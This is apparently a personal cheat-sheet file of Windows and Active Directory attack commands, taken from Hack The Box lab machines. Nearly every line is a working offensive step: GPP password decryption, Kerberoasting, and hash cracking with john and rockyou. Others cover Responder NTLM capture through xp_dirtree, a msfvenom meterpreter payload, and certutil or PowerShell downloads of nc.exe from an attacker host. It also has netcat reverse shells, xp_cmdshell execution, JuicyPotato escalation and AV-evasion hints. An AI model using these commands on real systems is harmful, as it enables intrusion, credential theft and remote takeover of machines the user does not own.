-
Notifications
You must be signed in to change notification settings - Fork 0
/
Windows
140 lines (89 loc) · 4.38 KB
/
Windows
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
## Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\
## findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
##Kerberos on 88 , netbios-ssn on 139 , ldap on 389 and 3268 ==> important ports
##smbmap -H 10.10.10.100 ==> netbios- ssn on 139
## connect to the smb share
##smbclient //10.10.10.100/share name with access
## gppdecrypt for group policy password decryption
## use the credentials from gpp decryption
## smbclient //10.10.10.100/Users -U SVC_TGS
## user is owned go for kereberoasting to get the administrator ticket
## ./GetUserSPNs.py -request active.htb/SVC_TGS ==> from impacket
## crack the administrator ticket with john
##./john admin.txt --wordlist=/usr/share/wordlists/rockyou.txt
## got the administrator password. Get the root shell
## ./psexec.py administrator@active.htb
##smbclient //secnotes.htb/new-site -U "tyler"
## Grep in windowss
## dir *.exe /b/s | findstr bash
## Sqli in sqlserver. use xpdirtree to contact smb and get the creds
## responder -I tun0 ==> run the responder to steal ntlm hashes
## xpdirtree : 1; EXEC MASTER.sys.xp_dirtree '\\10.10.xx.xx\fakeshare'
## Get the hash and crack it using john
##./john stacy.txt --wordlist=/usr/share/wordlists/rockyou.txt
## exe format payload using msfvenom
## msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.xx.xx LPORT=1337 -f exe > taskkill.exe
## Download the file using powershell
## Invoke-WebRequest -o taskkill.exe http://10.10.xx.xx/taskkill.exe
## Stop and start service using powershell
## Stop-Service "Ubiquiti UniFi Video
## Start-Service "Ubiquiti UniFi Video"
## encode the msfvenom payload using phantom evasion for AV bypass
## Read the MS access database mdb file
## mdb-tables backup.mdb
## read the tables from the db dump
## mdb-export backup.mdb auth_user
## Read the mail pst files
## readpst Access\ Control.pst
## c:/users ==> home dir in windows. subdirs are administrator and users on the system
## type somefile.lnk
## runas
## runas /user:Administrator /savecred "nc.exe -c cmd.exe 10.10.xx.xx 1337
## Download the file using cert-util
## certutil -urlcache -split -f http://10.10.xx.xx/nc.exe nc.exe
## UDP on windows
## nmap -vvv -sU -o nmapudp conceal.htb --max-retries 0
## snmpwalk
## snmpwalk -c public -v 1 conceal.htb
## use crackstation for cracking
## enumerate the ike vpn service
## ike-scan hostname
## check privileges
## whoami /priv
## SeImpersonatePrivilege can lead to juicy potato priv esc
## certutil -urlcache -split -f http://10.10.xx.xx/juicypotato.exe juicypotato.exe
## certutil -urlcache -split -f http://10.10.xx.xx/nc.exe nc.exe
## echo C:\users\Destitute\appdata\local\temp\nc.exe -e cmd.exe 10.10.xx.xx 1340 > rev.bat
## juicypotato.exe -p C:\users\Destitute\appdata\local\temp\rev.bat -l 1340 -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
## list the smb shares
##smbclient --list //querier.htb/ -U ""
## Anononymous access
## smbclient //querier.htb/Reports/ -U ""
## use olevba for excel analysis
## olevba Currency\ Volume\ Report.xlsm
## connect mssql server with impacket with the creds
## mssqlclient.py reporting@querier.htb -db volume
## mssqlclient.py reporting@querier.htb -db volume -windows-auth
## in the Sql shell through impacket
## enable_xp_cmdshell ==> check we have permission to enable
## responder -I tun0
## EXEC MASTER.sys.xp_dirtree '\\10.10.xx.xx\fakeshare'
## crack the ntlm v2 hash using john
## john --wordlist=/usr/share/wordlists/rockyou.txt mssql-svc.hash
## Now enable xp-cmdshell
## mssqlclient.py reporting@querier.htb -db volume -windows-auth
## enable_xp_cmdshell
## EXEC xp_cmdshell 'whoami'
## copy the nc from python server
## SQL> EXEC xp_cmdshell 'powershell.exe Invoke-WebRequest -o C:\Users\mssql-svc\appdata\local\temp\nc.exe http://10.10.xx.xx/nc.exe'
## Get the reverse shell
## EXEC xp_cmdshell 'C:\Users\mssql-svc\appdata\local\temp\nc.exe -e cmd.exe 10.10.xx.xx 1337'
## check the group policy files crack it through gppdecrypt get the administrator password
## use the psexec from impacket to get root
## use lookupsid.py from impacket to enumerate the other users with creds
## lookupsid.py hazard:stealth1agent@heist.htb
## authenticate with win-rm
## evil-winrm -i hostname -u user -s option -e option
## upload and download through winrm
## cmd /c "strings64.exe -accepteula firefox.exe_191129_211531.dmp > firefox.exe_191129_211531.txt"
## findstr "password" ./firefox.exe_191129_211531.txt